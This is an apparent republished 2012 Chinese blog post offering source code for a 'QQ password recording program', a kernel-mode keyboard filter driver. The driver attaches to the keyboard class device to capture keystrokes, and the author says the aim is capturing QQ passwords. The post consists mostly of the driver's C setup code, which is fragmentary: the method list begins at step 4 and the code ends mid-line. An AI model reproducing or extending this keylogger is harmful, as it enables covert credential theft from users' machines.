文档介绍:记事本
QQ密码记录程序源码
2012-05-15 14:54 978人阅读评论(11) 收藏举报
最近看了看c++,写个程序玩玩。因为用户态代码不好截取到qq密码,写个键盘分层驱动。试了试效果还可以。
开发环境  vs2008 winddk ddkwizard       windowsxp   Dbgview
 实现方法
4. 从DebugView的日志文件中读出键盘按键。
具体代码
PFILE_OBJECT fileOjbect;
PDEVICE_OBJECT deviceObject;
UNICODE_STRING deviceName;
PDEVICE_EXTENSION pdx;
PDEVICE_OBJECT filterDeviceObject;
PDEVICE_OBJECT targetDevice;
fileOjbect=NULL;
RtlInitUnicodeString(&deviceName,L"\\Device\\KeyBoardClass0");
status=IoGetDeviceObjectPointer(&deviceName,ESS,&fileOjbect,&deviceObject);
pdoDeviceObj->Flags |= DO_BUFFERED_IO;
pdx=(PDEVICE_EXTENSION)pdoDeviceObj->DeviceExtension;
pdx->pDevice=pdoDeviceObj;
pdx->ustrDeviceName=usDeviceName;
filterDeviceObject=((PDEVICE_EXTENSION)DriverObject->DeviceObject->DeviceExtension)->pDevice;
targetDevice=IoAttachDeviceToDeviceStack(filterDeviceObject,deviceObject);
((PDEVICE_EXTENSION)DriverObject->DeviceObject->DeviceExtension)->TargetDevice=targetDevice;
filterDeviceObject->DeviceType=targetDevice->DeviceType; 
filterDeviceObject->Characteristics=targetDevice->Characteristics;
filterDeviceObject->Flags&=~DO_DEVICE_INITIALIZING;
filterDeviceObject->Flags|=(targetDevice->Flags&(DO_DIRECT_IO|DO_BUFFERED_IO));
ObDereferenceObject(fileOjbect);
return ESS;
PDEVICE_EXTENSION pdx;
pdx=(PDEV